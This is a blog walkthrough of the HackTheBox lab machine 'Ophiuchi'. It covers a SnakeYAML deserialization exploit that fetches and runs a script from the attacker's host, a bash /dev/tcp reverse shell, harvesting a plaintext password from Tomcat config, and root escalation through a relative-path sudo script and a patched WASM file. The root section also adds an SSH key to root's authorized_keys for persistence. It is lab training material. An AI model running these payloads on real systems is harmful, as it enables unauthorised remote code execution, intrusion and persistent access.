HackTheBox: (“Ophiuchi”) — Walkthrough

Mohamed Elmasry
7 min readJul 3, 2021

--

Hi People :D

Today we gonna solve “Ophiuchi” machine from HackTheBox, a medium machine that focuses on YAML exploitation and WASM manipulation, let’s get started :D

Enumeration

— — — — — —

Start with Nmap as usual

nmap -A 10.10.10.227

We have two open ports (22/8080) so let’s check on the website on port 8080

Web Enumeration

— — — — — — — —

The index page says that it has a YAML Parsing function and there are some directories ( /host-manager & /manager & /test ) but they says “Tomcat Manager Application” and they are asking for credentials to access them ( default credentials didn’t work )

Let’s try to type anything then click on the Parse button, it gives us an error

This error is not important for us, so let’s look for any YAML exploit.

The First Article that appeared to me in google search talks about SnakeYaml Deserialization Exploit

Based on this article, we can trigger RCE in the YAML Parsing function.

There’s a GitHub repo link inside this article so let’s check on it

Exploitation

— — — — — —

This GitHub repo explains well what should we do.

we need to download the AwesomeScriptEngineFactory.java script first and after editing it, we should compile it then get a shell by pasting the exploitation code on the machine website

After downloading the project, edit the AwesomeScriptEngineFactory.java script to make the website copy a file called shell.sh from your system then execute it as follows:

Runtime.getRuntime().exec("curl http://{Your_IP}/shell.sh -o /tmp/shell.sh");Runtime.getRuntime().exec("bash /tmp/shell.sh")

And this shell.sh script contains a bash reverse shell command

#!/bin/sh
bash -i >& /dev/tcp/{Your_IP}/4444 0>&1

The next step is compiling the java script using:

javac /Path/To/AwesomeScriptEngineFactory.java

( Important Note: if you have a newer version of java ( >11 ), you will get an error message from the website and the exploit will NOT work )

Then create a yaml-payload.jar file using:

jar -cvf /Path/To/yaml-payload/yaml-payload.jar -C /Path/To/yaml-payload/src/ .

Now we are ready for getting the shell.

First, start a python3 HTTP server in the /yaml-payload directory ( that contains shell.sh and yaml-payload.jar ) using:

python3 -m http.server

Then start a Netcat listener and navigate to the website again and paste this command :

!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["
http://{Your_IP}:8000/yaml-payload.jar"]
]]
]

Finally, we got a shell as tomcat

User Flag

— — — — —

Do some shell improvement using:

python3 -c 'import pty; pty.spawn("/bin/bash")'export TERM=linux

Then move to /opt/tomcat/conf directory, there are a lot of files but you can grep for password word in all files inside this directory using:

cat * | grep password

tomcat-users.xsd file has an admin user creds (admin:whythereisalimit)

We can use these creds (admin:whythereisalimit) to SSH into admin user and read the user flag ☺

Root Flag

— — — — —

Execute sudo -l command from the admin shell, we can run a script called index.go as root without password

Move to /opt/wasm-functions/ directory and read index.go content.

This script reads a file called main.wasm then checks the value of the variable f, if the value was anything other than 1, it will print “Not ready to deploy” and if the value was 1, it will print “Ready to deploy” then execute a file called deploy.sh

You can see that the full path is not used for main.wasm and the deploy.sh files, so we can manipulate it.

These files will be read from our current working directory, so we can copy the main.wasm file to another directory and create a custom deploy.sh script that contains any test command like:

#!/bin/shecho $(id)

Now we have the requirements for the index.go script so let’s run it, unfortunately, it prints “Not ready to deploy” ☹.

If you remember the index.go script, this means that the value of the variable f is not equal to 1.

So that, we need to edit the main.wasm file to make the value of the variable f equal to 1.

Let’s copy this file to our local system using:

nc -lvp 4444 > main.wasm ( local )cat main.wasm | nc {Your-IP} 4444 ( HTB machine )

The .wasm files can’t be read directly by using the text editor, so we need a tool that can handle the files with this extension

After some searching, I found This GitHub Toolkit that could easily handle the WebAssembly files

We have a binary toolkit and web demos ( I used the web demos because it’s much faster and easier )

First, navigate to wasm2wat to convert the file to a readable format.

Click on the Upload button then choose the main.wasm file

After uploading the file, we got a semi-readable format.

There’s no f variable in this format, but there’s a constant called i32 which has a value of 0 and I think that this is the f variable so let’s try to change its value to 1.

( Note: disable all features inside the red box )

After editing this file, we need to get it back to the .wasm extension, so let’s navigate to the wat2wasm website and paste the wat format of the main.wasm then click on the Download button to download the modified .wasm file

Rename the downloaded file to main.wasm using:

mv test.wasm main.wasm

Then upload the modified main.wasm file to the machine using:

nc -lnvp 4444 > main.wasm ( HTB machine )cat main.wasm | nc {Machine_IP} 4444 ( local )

Now let’s see if we changed the right value.

Execute sudo /usr/bin/go run /opt/wasm-functions/index.go in our directory ( that has the modified main.wasm and deploy.sh ), this time we got “Ready to deploy” message and the deploy.sh script has been executed successfully.

This means that the i32 constant which we changed its value to 1 is the f variable

We can execute any command as root, so let’s read the root flag directly from /root/root.txt file by editing deploy.sh as following:

#!/bin/shcat /root/root.txt

Then execute sudo /usr/bin/go run /opt/wasm-functions/index.go command again, this time we got the root flag ☺

OR you can make the deploy.sh script puts your SSH key into the root authorized_keys file to be able to SSH into the root, the command:

#!/bin/shecho "{Your_SSH_pub_key}" >> /root/.ssh/authorized_keys

Thanks for reading and I hope you love this writeup ❤.

You can give me Respect on my HackTheBox Account (if you want :D).

Facebook TwitterLinkedIn

--

--

Mohamed Elmasry

Digital Forensics Investigator | CTF player and creator | SOC Analysts | Threat Hunter